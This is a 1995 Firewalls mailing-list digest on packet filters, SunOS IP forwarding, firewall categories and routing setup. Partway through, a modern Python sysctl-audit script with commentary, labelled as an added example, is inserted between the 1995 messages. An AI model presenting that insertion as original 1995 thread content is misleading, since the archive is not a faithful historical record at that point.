From firewalls-owner Tue Aug 8 02:34:48 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA25872 for firewalls-outgoing; Tue, 8 Aug 1995 01:42:10 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA25828 for ; Tue, 8 Aug 1995 01:41:59 -0700 Received: from yarrina.connect.com.au(192.189.54.17) by miles via smap (V1.3) id sma025817; Tue Aug 8 01:41:40 1995 Received: from suburbia.net (suburbia.apana.org.au [192.188.107.90]) by yarrina.connect.com.au with ESMTP id SAA03343 (8.6.12/IDA-1.6); Tue, 8 Aug 1995 18:40:17 +1000 Received: (proff@localhost) by suburbia.net (8.6.12/Miles-950430-1) id SAA20299; Tue, 8 Aug 1995 18:40:11 +1000 From: Julian Assange Message-Id: <199508080840.SAA20299@suburbia.net> Subject: Re: Sparc2 as a 3-way packet filter? To: detzel@medoc.medoc-ias.u-psud.fr (Vincent DETZEL) Date: Tue, 8 Aug 1995 18:40:10 +1000 (EST) Cc: firewalls@greatcircle.com In-Reply-To: <199508080716.JAA07877@medoc.medoc-ias.u-psud.fr> from "Vincent DETZEL" at Aug 8, 95 09:16:46 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 411 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> - as for ip-fil (ftp:coombs.anu.edu.au/pub/net/kernel/ip-fil2.7.3.tar.gz) > it appears to me that it begins to be widely chosen and as a matter of fact, > many changes applied on this package every week (last release dated : Aug 1). > > Does it mean that ip-fil is going to become much more efficient and functional than screend? But you forget the most important reason. Avalog aza clue.
-Proff

From firewalls-owner Tue Aug 8 05:00:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA01275 for firewalls-outgoing; Tue, 8 Aug 1995 04:49:45 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA01267 for ; Tue, 8 Aug 1995 04:49:43 -0700 Received: from argo.hks.com(192.156.170.1) by miles via smap (V1.3) id sma001265; Tue Aug 8 04:49:14 1995 Received: from ragnarok.hks.com (ragnarok.hks.com [192.101.199.9]) by argo.hks.com (8.6.12/8.6.12) with ESMTP id LAA10347; Tue, 8 Aug 1995 11:48:05 GMT Received: by ragnarok.hks.com (940816.SGI.8.6.9/940406.SGI) id HAA07224; Tue, 8 Aug 1995 07:48:04 -0400 From: "Jim Littlefield" Message-Id: <9508080748.ZM7222@ragnarok.hks.com> Date: Tue, 8 Aug 1995 07:48:03 -0400 In-Reply-To: millar@pobox.upenn.edu (Dave Millar) "Host protection with ipfilterd?" (Aug 7, 5:02pm) References: <199508072102.RAA01174@pobox.upenn.edu> X-Mailer: Z-Mail (3.2.1 15feb95) To: millar@pobox.upenn.edu (Dave Millar), firewalls@GreatCircle.COM Subject: Re: Host protection with ipfilterd? Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On Aug 7, 5:02pm, Dave Millar wrote: : Someone has asked me if it is appropriate to use ipfilterd to filter access : to their SGI host residing on a campus subnet. My take on it is that : ipfilterd is appropriate if you want to dedicate your SGI as a router to : filter packets between an internal subnet and an external network/subnet, : but that it is not the right tool for protecting the SGI host *itself*. : Seems to me like tcp wrappers and portmapper are the proper tools for : host-based filtering (with the caveat that such filtering is not as : comprehensive or flexible as router-based packet filtering, can only : address filtering services "mediated" through either inetd or rpc, and : therefore can not address filtering other services such as UDP, ICMP, etc.)
: : I assume the same would hold true for screend as well. : : Am I on the right track, here? I can't say that I like everything ipfilterd does or does not do (ask SGI ;), but you can filter based on incoming interface which does permit you to protect the firewall itself. Of course, tcp_wrappers, fwtk, etc. are all necessities, also. -- Jim Littlefield "That's no ordinary rabbit, that's the most foul, cruel and bad-tempered rodent you ever set eyes on!" - Tim, Monty Python's The Holy Grail

From firewalls-owner Tue Aug 8 05:30:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA01361 for firewalls-outgoing; Tue, 8 Aug 1995 05:02:46 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA01353 for ; Tue, 8 Aug 1995 05:02:43 -0700 Received: from neptune.tis.com(192.94.214.96) by miles via smap (V1.3) id sma001347; Tue Aug 8 05:02:23 1995 Received: from relay.tis.com by neptune.TIS.COM id aa05237; 8 Aug 95 8:00 EDT Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0.1) id xma026863; Tue, 8 Aug 95 07:51:37 -0400 Received: from sol.tis.com by tis.com (4.1/SUN-5.64) id AA13667; Tue, 8 Aug 95 07:58:57 EDT Message-Id: <9508081158.AA13667@tis.com> From: Frederick M Avolio X-Organization: Trusted Information Systems, Inc. X-Phone: +1 301 854 6889, +1 410 442 1673, FAX: +1 301 854 5363 To: CASSIDY MEYER Cc: firewalls@greatcircle.com Subject: Re: iWay-One In-Reply-To: Your message of Tue, 08 Aug 95 08:18:08 +0200. <187A644343@cncjnk.wcape.gov.za> Date: Tue, 08 Aug 95 07:58:57 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

There was going to be an Internet Firewalls Symposium, to be held in Dallas. But when all of the vendors who had a firewall registered, it was found that there was no room left in Dallas hotels for attendees. I am joking.
f From firewalls-owner Tue Aug 8 08:00:28 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04019 for firewalls-outgoing; Tue, 8 Aug 1995 07:01:29 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04011 for ; Tue, 8 Aug 1995 07:01:26 -0700 Received: from soscorp.soscorp.com(204.52.248.130) by miles via smap (V1.3) id sma003998; Tue Aug 8 07:00:24 1995 Received: from fearless.soscorp.com (fearless.soscorp.com [204.52.249.130]) by brimstone.soscorp.com (2.28/8.6.12/8.6.4.287) with BSMTP id BS0018086/JAA18091; Tue, 8 Aug 1995 09:59:03 -0400 Received: from dauntless.soscorp.com (dauntless.soscorp.com [204.52.249.141]) by fearless.soscorp.com (8.6.10/8.6.4.287) with ESMTP id JAA19435; Tue, 8 Aug 1995 09:58:20 -0400 Received: from dauntless.soscorp.com by dauntless.soscorp.com (8.6.10/SMI-4.1) id JAA14521; Tue, 8 Aug 1995 09:58:18 -0400 Message-Id: <199508081358.JAA14521@dauntless.soscorp.com> To: bobb@ns1.infonautics.com cc: firewalls@greatcircle.com In-Reply-To: <199508080021.RAA19137@translation.com> Subject: Re: using suns/sunos for gateway host(s) Date: Tue, 08 Aug 1995 09:58:13 -0400 From: Seth Robertson Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <199508080021.RAA19137@translation.com>, Andrew Foss wrote: >adb -k -w /vmunix /dev/mem >ip_forwarding?x (if this returns 01 it's on) >ip_forwarding/w 0 (turns it off in /dev/mem, your running image) >ip_forwarding?w 0 (turns it off in /vmunix so it'll be off next reboot) >^d (exits adb) In SunOS, you need to change the value to -1, not zero. If the value is zero, it will be set to one for you if SunOS thinks there are two interfaces on the machine. Even -1 will not prevent *some* IP forwarding from taking place--if it thinks the packet is source routed and is going out the same interface it came in, then the packet will be forwarded. 
Solaris has this same ``feature'' regarding ip_forwarding being disregarded under these circumstances. (I am given to understand this is to support Solaris's ping -l.) You also should worry about source routing and ICMP redirects. In SunOS, you cannot disable them via kernel variables. Sigh. ---- Seth Robertson voice: +1 800 SOS UNIX +1 212 686 5700 SOS Corporation fax: +1 212 686 5703 461 5th Avenue, 16th floor email: seth@soscorp.com New York, NY 10017 http://www.soscorp.com/

From firewalls-owner Tue Aug 8 08:44:35 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04096 for firewalls-outgoing; Tue, 8 Aug 1995 07:04:29 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04077 for ; Tue, 8 Aug 1995 07:04:26 -0700 From: harley@acs.bu.edu Received: from acs.bu.edu(128.197.152.10) by miles via smap (V1.3) id sma004073; Tue Aug 8 07:04:21 1995 Received: by acs.bu.edu (8.6.11/BU_SmartClient-1.0) id KAA128888; Tue, 8 Aug 1995 10:01:32 -0400 Date: Tue, 8 Aug 1995 10:01:32 -0400 Message-Id: <199508081401.KAA128888@acs.bu.edu> To: firewalls@greatcircle.com Subject: Firewall categorization Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi Folks: Please excuse some basic questions from a newbie, but: Many people (including Cheswick and Bellovin) describe three different categories of firewalls: packet-filtering gateways, application-level gateways, and circuit-level gateways. Would a typical Cisco with access control lists and TACACS+ be considered a packet-filtering gateway? Which category does Firewall-1 fit into? The trade press continually paints them as a packet-filter but Checkpoint's marketing folks have taken pains to distance themselves from this label. How about Livingston's Firewall IRX? Network Systems NetSentry? Finally, what are some examples of a circuit-level gateway? IBM's NetSP? Others? Thanks in advance.
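The adb exchange between Andrew Foss and Seth Robertson above makes two points that outlive SunOS 4.1.3: a gateway host must not forward, and the value you wrote is not necessarily the value the kernel is running with, so check the live setting after boot rather than the file you edited. As an added example, not code from the thread, the script below parses `sysctl -a` style output (or reads the running kernel), audits forwarding, source routing and ICMP redirect handling against a gateway policy, and emits the sysctl.conf lines that fix what it finds. The Linux sysctl key names are this example's assumption (the SunOS variable in the thread is simply ip_forwarding); the SAMPLE text is constructed.

```python
"""Audit the kernel knobs a firewall gateway host must have switched off.

Added example for this thread; Linux sysctl names are an assumption."""
import os

# Expected values for a dual-homed gateway that must not route packets.
GATEWAY_POLICY = {
    "net.ipv4.ip_forward": 0,
    "net.ipv4.conf.all.accept_source_route": 0,
    "net.ipv4.conf.default.accept_source_route": 0,
    "net.ipv4.conf.all.accept_redirects": 0,
    "net.ipv4.conf.default.accept_redirects": 0,
    "net.ipv4.conf.all.send_redirects": 0,
    "net.ipv4.conf.all.secure_redirects": 0,
}

# Constructed `sysctl -a` excerpt from a host that would fail the audit.
SAMPLE = """\
net.ipv4.ip_forward = 1
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.default.accept_source_route = 0
net.ipv4.conf.all.accept_redirects = 1
net.ipv4.conf.default.accept_redirects = 0
net.ipv4.conf.all.send_redirects = 0
net.ipv4.conf.all.secure_redirects = 0
"""


def parse_sysctl(text: str) -> dict:
    """Parse "key = value" lines (as printed by sysctl -a) into {key: value}."""
    settings = {}
    for line in text.splitlines():
        if "=" not in line or line.lstrip().startswith("#"):
            continue
        key, _, value = line.partition("=")
        settings[key.strip()] = value.strip()
    return settings


def read_live(proc_root: str = "/proc/sys") -> dict:
    """Read the policy keys from the running kernel (Linux only); this is
    the live value, which is what matters, not what sysctl.conf says."""
    settings = {}
    for key in GATEWAY_POLICY:
        path = os.path.join(proc_root, *key.split("."))
        try:
            with open(path) as fh:
                settings[key] = fh.read().strip()
        except OSError:
            pass  # absent on this kernel; audit() reports it as missing
    return settings


def audit(settings: dict) -> list:
    """Return (key, observed, expected) for every knob violating the policy.
    observed is None when the key is missing from the input."""
    findings = []
    for key, expected in GATEWAY_POLICY.items():
        observed = settings.get(key)
        if observed is None:
            findings.append((key, None, expected))
        elif int(observed) != expected:
            findings.append((key, int(observed), expected))
    return findings


def remediation(findings: list) -> str:
    """sysctl.conf fragment that corrects the reported findings."""
    return "\n".join(f"{key} = {expected}" for key, _, expected in findings)


def sunos_forwarding_off(ip_forwarding: int) -> bool:
    """SunOS 4.x, per Seth's note in the thread: a 0 is re-armed to 1 at
    boot on a multi-homed host, so only -1 counts as forwarding disabled."""
    return ip_forwarding == -1


if __name__ == "__main__":
    live = read_live() or parse_sysctl(SAMPLE)   # fall back to the sample
    for key, observed, expected in audit(live):
        print(f"FAIL {key}: observed={observed} expected={expected}")
    print(remediation(audit(live)) or "# all gateway settings in policy")
```

Run it from cron or a boot script on the gateway and alarm on any finding; the audit deliberately treats a missing key as a failure, since a knob you cannot read is a knob you cannot vouch for.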
From firewalls-owner Tue Aug 8 08:45:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04064 for firewalls-outgoing; Tue, 8 Aug 1995 07:03:29 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04044 for ; Tue, 8 Aug 1995 07:03:26 -0700 Received: from dg-rtp.rtp.dg.com(128.222.1.2) by miles via smap (V1.3) id sma004040; Tue Aug 8 07:02:40 1995 Received: from wellspring.us.dg.com by dg-rtp.dg.com (5.4R2.01/dg-rtp-v02) id AA06350; Tue, 8 Aug 1995 10:01:03 -0400 Received: from immis184 by wellspring.us.dg.com (5.4.1/dg-gens08) id AA24229; Tue, 8 Aug 1995 10:01:00 -0400 Message-Id: <9508081401.AA24229@wellspring.us.dg.com> Comments: Authenticated sender is From: "Jim Carroll" Organization: Data General (Canada) Inc. To: firewalls@greatcircle.com Date: Tue, 8 Aug 1995 10:00:04 -0500 Subject: Re: InfoSec policies made easy? Reply-To: jcarroll@wellspring.us.dg.com Priority: normal X-Mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rumour has it that on 4 Aug 95 at 15:18, Jim Carroll said: > I was cleaning up around my desk when I came across a promo entitled > "Information Security Policies Made Easy". Dang near forgot about > this. I'll forward noteworthy points for comment: Got lots of "please e-mail" and "please post" messages, so here are the lewd detail$: Title: Information Security Policies Made Easy Author: Charles Cresson Wood Price: $495.00 (this price may not be current) Vendor: Baseline Software PO Box 1219 Sausalito, California 94966 USA Phone: 800-829-9955 (USA/Canada) 415-332-7763 Fax: 415-332-8032 NB: If this information is no longer current, don't followup to me. You now know as much as I do about finding out how to get the book. DISCLAIMER: I do not sell the book, nor do I work for Mr. Wood or for Baseline Software. I've never met them, I've never spoken with them, I've never faxed them, I've never sent them any mail. 
This is not to say that I won't buy the book. ;) -- Jim Carroll - jcarroll@wellspring.us.dg.com ... the usual disclaimers ... ## The more I learn, the less I know. ## ## Eventually I'll know everything about nothing. ## From firewalls-owner Tue Aug 8 08:45:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04351 for firewalls-outgoing; Tue, 8 Aug 1995 07:16:28 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04343 for ; Tue, 8 Aug 1995 07:16:26 -0700 From: harley@acs.bu.edu Received: from acs.bu.edu(128.197.152.10) by miles via smap (V1.3) id sma004341; Tue Aug 8 07:16:14 1995 Received: by acs.bu.edu (8.6.11/BU_SmartClient-1.0) id KAA141668; Tue, 8 Aug 1995 10:11:51 -0400 Date: Tue, 8 Aug 1995 10:11:51 -0400 Message-Id: <199508081411.KAA141668@acs.bu.edu> To: firewalls@greatcircle.com Subject: Firewall categorization Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please excuse some basic questions from a newbie, but: Many people (including Cheswick and Bellovin) describe three different categories of firewalls: packet-filtering gateways, application-level gateways, and circuit-level gateways. Would a typical Cisco with access control lists and TACACS+ support be considered a packet-filtering gateway? Which category does Firewall-1 fit into? The trade press continually paints them as a packet-filter but Checkpoint's marketing folks have taken pains to distance themselves from this label. How about Livingston's Firewall IRX? Network System's NetSentry? Are all these products in the same category? Finally, what are some examples of a circuit-level gateway? IBM's NetSP? Others? Thanks! 
From firewalls-owner Tue Aug 8 09:03:33 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04334 for firewalls-outgoing; Tue, 8 Aug 1995 07:15:29 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04319 for ; Tue, 8 Aug 1995 07:15:26 -0700
From: Ruiyuan_Jiang/Advantage_KBS_at_LotusXchg@njcorp.akbs.com
Received: from netcom11.netcom.com(192.100.81.121) by miles via smap (V1.3) id sma004315; Tue Aug 8 07:15:20 1995
Received: from njcorp.akbs.com by netcom11.netcom.com (8.6.12/Netcom) id HAA15972; Tue, 8 Aug 1995 07:12:11 -0700
Received: from cc:Mail by njcorp.akbs.com id AA807902096; Tue, 08 Aug 95 10:14:00 EST
Date: Tue, 08 Aug 95 10:14:00 EST
Encoding: 16 Text
Message-Id: <9507088079.AA807902096@njcorp.akbs.com>
To: firewalls@greatcircle.com
Subject: Test Methodology of Internet Firewall
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I just set up my Internet firewall. I have a question about how to effectively test my firewall, whether it works OK or not. Since I am not an Internet hacker, I don't know how to test it. I know I can try to ftp and telnet to some hosts in my internal LAN using my account, which I got when I was a student at the university. Besides these standard methods, is there any more efficient way to test?

Thanks in advance.

Ruiyuan Jiang
System Administrator
ADVANTAGE kbs, Inc.
rjiang@akbs.com
Lotus Notes Business Partner
HP-UX Business Partner
(908) 287-2236
FAX (908) 287-3193

From firewalls-owner Tue Aug 8 09:30:45 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA05211 for firewalls-outgoing; Tue, 8 Aug 1995 07:43:41 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA05195 for ; Tue, 8 Aug 1995 07:43:39 -0700
Received: from unknown(151.190.1.25) by miles via smap (V1.3) id sma005192; Tue Aug 8 07:42:56 1995
Date: Tue, 8 Aug 1995 10:28:38 -0400
Message-Id: <95080810283812@odo.acdnj.itt.com>
From: nabadm@odo.acdnj.itt.com (set chaos/total)
To: firewalls@greatcircle.com
Subject: NISPOM availability
X-VMS-To: SMTP%"firewalls@GreatCircle.com"
X-VMS-Cc: NABADM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

For those of you who have asked where to get your own copy of the NISPOM:

I got my copy from my company's Industrial Security department. They in turn received it from our friendly local DIS (Defense Investigative Service) reps. So if you are a government contractor, your company should already have a copy of this document. If you are not a government contractor but into pain nonetheless, I would think that you should be able to get a copy from the Government Printing Office. I believe the document number is DoD 5220.22-M. The manual is entitled "National Industrial Security Program Operating Manual" and is dated January 1, 1995.

If you are interested in this document as a template for some sort of security policy, I think you will be very disappointed. It is targeted at a very specific environment. Only one (short, 20 page) chapter deals with computer and network security. Aside from the clearing and sanitization matrix, there is a dearth of technical computer information.

Since there are copies of the Orange Book et al. on the net, I will see if I can find an electronic copy of the NISPOM.
-------------------------------------------------------------------------------
"Crisis over, back to panic mode!"
-------------------------------------------------------------------------------
N.A. Bogart                            nabadm@odo.acdnj.itt.com
OpenVMS & Security Systems Manager     bogart@itt.com
ITT Avionics                           (201) 284-5117 VOICE(MAIL)
100 Kingsland Road                     (201) 284-3947 FAX
Clifton NJ 07014                       (201) 730-2681 PAGER
-------------------------------------------------------------------------------

From firewalls-owner Tue Aug 8 10:05:22 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA09263 for firewalls-outgoing; Tue, 8 Aug 1995 09:40:32 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA09192 for ; Tue, 8 Aug 1995 09:40:23 -0700
Received: from edison.eng.auburn.edu(131.204.10.13) by miles via smap (V1.3) id sma009117; Tue Aug 8 09:39:32 1995
Received: from netman.eng.auburn.edu (20663@netman.eng.auburn.edu [131.204.12.24]) by edison.eng.auburn.edu (8.6.12/8.6.4) with ESMTP id LAA19699; Tue, 8 Aug 1995 11:38:04 -0500
From: Doug Hughes
Received: from localhost (doug@localhost) by netman.eng.auburn.edu (8.6.4/8.6.4) id LAA10216; Tue, 8 Aug 1995 11:38:02 -0500
Date: Tue, 8 Aug 1995 11:38:02 -0500
Subject: Re: klaxon
To: dannyc@gmap.leeds.ac.uk
Cc: firewalls@greatcircle.com
Message-Id:
In-Reply-To: <6328.9508080827@gmap.leeds.ac.uk>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

It sends out messages at auth.notice. Your syslog.conf should use this facility.level to do what you want with them. You can also change it easily in the source in two places (where it says LOG_AUTH|LOG_NOTICE).

If you have any more usage questions, you're probably best off asking me directly, since usage of it is not yet what you would call widespread.
:)

--
____________________________________________________________________________
Doug Hughes                              Engineering Network Services
System/Net Admin                         Auburn University
doug@eng.auburn.edu
"Real programmers use cat > file.as"

From firewalls-owner Tue Aug 8 10:33:04 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA08841 for firewalls-outgoing; Tue, 8 Aug 1995 09:33:20 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA08807 for ; Tue, 8 Aug 1995 09:33:14 -0700
Received: from rye.city.ac.uk(138.40.11.7) by miles via smap (V1.3) id sma008765; Tue Aug 8 09:32:19 1995
Received: from mnt-pleasant.city.ac.uk by rye.city.ac.uk with SMTP (PP) id <27301-0@rye.city.ac.uk>; Tue, 8 Aug 1995 17:30:43 +0100
Received: from euston (euston.city.ac.uk [138.40.41.1]) by mnt-pleasant.city.ac.uk (8.6.12/8.6.12) with SMTP id RAA01667; Tue, 8 Aug 1995 17:30:40 +0100
Date: Tue, 8 Aug 1995 17:28:09 +0100 (BST)
From: David Brownlee
X-Sender: sh391@euston
To: Seth Robertson
cc: bobb@ns1.infonautics.com, firewalls@greatcircle.com
Subject: Re: using suns/sunos for gateway host(s)
In-Reply-To: <199508081358.JAA14521@dauntless.soscorp.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

If you're not committed to SunOS, you could always put a BSD variant (i.e. NetBSD) on the machine - that should do what you need pretty much out of the box (& it's free :)

		David

D.K.Brownlee@city.ac.uk (MIME)        +44 171 477 8186       {post,host}master (abs)
Network Analyst, UCS, City University, Northampton Square, London EC1V 0HB.
<<< Monochrome - Largest UK Internet BBS - telnet mono.city.ac.uk >>>

On Tue, 8 Aug 1995, Seth Robertson wrote:

>
> In article <199508080021.RAA19137@translation.com>,
> Andrew Foss wrote:
>
> >adb -k -w /vmunix /dev/mem
> >ip_forwarding?x         (if this returns 01 it's on)
> >ip_forwarding/w 0       (turns it off in /dev/mem, your running image)
> >ip_forwarding?w 0       (turns it off in /vmunix so it'll be off next reboot)
> >^d                      (exits adb)
>
> In SunOS, you need to change the value to -1, not zero.
>
> If the value is zero, it will be set to one for you if SunOS thinks
> there are two interfaces on the machine. Even -1 will not prevent
> *some* IP forwarding from taking place--if it thinks the packet is
> source routed and is going out the same interface it came in, then the
> packet will be forwarded. Solaris has this same ``feature'' regarding
> ip_forwarding being disregarded under these circumstances. (I am
> given to understand this is to support Solaris's ping -l.)
>
> You also should worry about source routing and ICMP redirects. In
> SunOS, you cannot disable them via kernel variables.
>
> Sigh.
>
> ----
> Seth Robertson                     voice: +1 800 SOS UNIX  +1 212 686 5700
> SOS Corporation                    fax:   +1 212 686 5703
> 461 5th Avenue, 16th floor         email: seth@soscorp.com
> New York, NY 10017                 http://www.soscorp.com/
>

From firewalls-owner Tue Aug 8 11:39:20 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA15626 for firewalls-outgoing; Tue, 8 Aug 1995 11:29:58 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA15583 for ; Tue, 8 Aug 1995 11:29:53 -0700
Received: from hydra.msgi.com(192.233.14.117) by miles via smap (V1.3) id sma015570; Tue Aug 8 11:29:22 1995
Received: from heimdall (heimdall [192.233.14.113]) by msgi.com (8.6.9/8.6.6) with SMTP id OAA26919; Tue, 8 Aug 1995 14:28:48 -0400
Date: Tue, 8 Aug 1995 14:35:25 -0900 (PDT)
From: Morgan Stair
To: firewalls@greatcircle.com, bblisa@bblisa.org
Subject: Phone numbers
X-Sender: morgan@hydra
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Does anyone know the phone numbers for these router companies? I'm still trying to straighten out our firewall / filtering situation! I'm looking for a good router with 1 ISDN plug and 2 ethernet plugs which can filter among the 3. MorningStar Tech doesn't do ISDN yet.

Livingston
Cisco
Protean

Thanks!
Morgan

-------------------------------------------------------------------------------
Morgan Stair                       MSGmass, Inc.
Email: Morgan@MSGI.com             Software Engineer
20 Blanchard Rd, Suite 11A         Phone: (617) 272-8665
Burlington MA, 01803               Fax:   (617) 272-0428
-------------------------------------------------------------------------------

From firewalls-owner Tue Aug 8 13:36:18 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA19970 for firewalls-outgoing; Tue, 8 Aug 1995 12:34:55 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA21958 for ; Mon, 7 Aug 1995 23:51:21 -0700
Message-Id: <199508080651.XAA21958@miles.greatcircle.com>
Received: from studm.tofs.ac.za(198.54.58.2) by miles via smap (V1.3) id sma021946; Mon Aug 7 23:50:42 1995
Received: by studm.tofs.ac.za (1.37.109.4/16.2) id AA14120; Tue, 8 Aug 95 08:47:47 +0200
From: DJ Kotze (Technikon OFS)
Subject: HELP - unwanted firewall
To: firewalls@GreatCircle.com
Date: Tue, 8 Aug 95 8:47:46 SAST
Mailer: Elm [revision: 70.85]
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I need assistance in turning an HP F30 acting like a firewall into one acting as a router.

To balance network traffic (most directed at the HP F30 with IP 198.54.48.2), we installed a second interface for the net 196.10.119.0.

Previously the scenario was

----------------------------------198.54.58.0 >> internet
               ^
               ^ 198.54.58.2
          196.10.119.0
               ^
          196.13.191.0

This was changed to

-------------------------------198.54.58.0 >> internet
               ^
               ^ 198.54.58.2
              /(F30) 196.10.119.70
             /
            ^ 196.10.119.0
            ^
       196.13.191.0

From the F30 I can ping and see all networks. From other machines (as well as the internet) only the 198.54.58.0 network is visible. The route to all the 196 networks (on the 2nd interface) is not advertised.

I have used route to add the following routes as static:

196.10.119.0   196.10.119.70   U
196.13.191.0   196.10.119.69   UG     (the last is the router to 196.13.191.0)

and have tried to configure gated.conf - obviously not correctly.
I am including a copy of gated.conf - please advise urgently

# gated routing daemon configuration info
#
rip on { };
hello on { };
egp off { };
static {
        default gateway 198.54.58.4 preference 255;
};
# Announce our default gateway
#
#
propagate proto rip {
        proto static {
                announce default;
        };
};
accept proto rip {};
propagate proto rip {
        proto rip {
                announce all;
        };
};

Thanks
Dana Kotze
Dana@studm.tofs.ac.za

--
************************************************************
* D J Kotze           Department Information Technology    *
* +27-51-4073096      Technikon OFS - South Africa         *
* dana@studm.tofs.ac.za                                    *
************************************************************

From firewalls-owner Tue Aug 8 13:38:35 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA17868 for firewalls-outgoing; Tue, 8 Aug 1995 12:03:07 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA17808 for ; Tue, 8 Aug 1995 12:02:56 -0700
Received: from intfw.bear.com(206.25.172.66) by miles via smap (V1.3) id sma017794; Tue Aug 8 12:02:22 1995
Received: by intfw.bear.com (4.1/SMI-4.1) id AA19507; Tue, 8 Aug 95 15:00:01 EDT
Received: from fastbear(165.168.74.3) by intfw via smap (V1.3) id sma019482; Tue Aug 8 14:58:04 1995
Received: from ursa2.bear.com by fastbear.bear.com (4.1/SMI-4.1/1.0 AMR 12/15/94) id AA06384; Tue, 8 Aug 95 14:59:20 EDT
Received: from jake by ursa2.bear.com (4.1/SMI-4.1/JMD+AMR+DJS) id AA09408; Tue, 8 Aug 95 14:58:47 EDT
Message-Id: <9508081858.AA09408@ursa2.bear.com>
Received: by jake (1.37.109.16/16.2) id AA189868327; Tue, 8 Aug 1995 14:58:47 -0400
Date: Tue, 8 Aug 1995 14:58:47 -0400
From: Ari Rabinowitz
To: firewalls@greatcircle.com
Subject: What is on port 5654?
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi all,

We recently got a live connection to the Internet and I have been looking through the firewall logs.
I noticed a few random telnet and finger attempts which I am ignoring for now (mostly from .edu sites). I also noticed a few attempts to access port 5654 from sparcy.euro.net, which seems to be in Amsterdam. Does anyone know what they expect to find on 5654? Is there anyone I should try to report these attempts to?

Any suggestions would be welcome.

Thanks,
Ari

--
Ari Rabinowitz, VP                                   ari@bear.com
Workstation Administrator, Postmaster, and Firewall watcher
Bear Stearns & Co. Inc.
--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or agreement or any information about any transaction, customer account or account activity contained in this communication.
*******************************************************************************

From firewalls-owner Tue Aug 8 14:01:07 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA23388 for firewalls-outgoing; Tue, 8 Aug 1995 13:52:07 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA23335 for ; Tue, 8 Aug 1995 13:52:00 -0700
Received: from blackhole.eas.asu.edu(129.219.31.171) by miles via smap (V1.3) id sma023325; Tue Aug 8 13:51:56 1995
Received: (from yhartojo@localhost) by blackhole.eas.asu.edu (8.6.12/8.6.9) id NAA01048 for firewalls@greatcircle.com; Tue, 8 Aug 1995 13:51:51 -0700
From: Francis Hartojo
Message-Id: <199508082051.NAA01048@blackhole.eas.asu.edu>
Subject: IP filtering package on Solaris 2.x.
To: firewalls@greatcircle.com
Date: Tue, 8 Aug 1995 13:51:49 -0700 (MST)
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 1246
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi all.

I'm just wondering if there are any shareware/public domain IP filtering packages available for Solaris 2.4 systems.
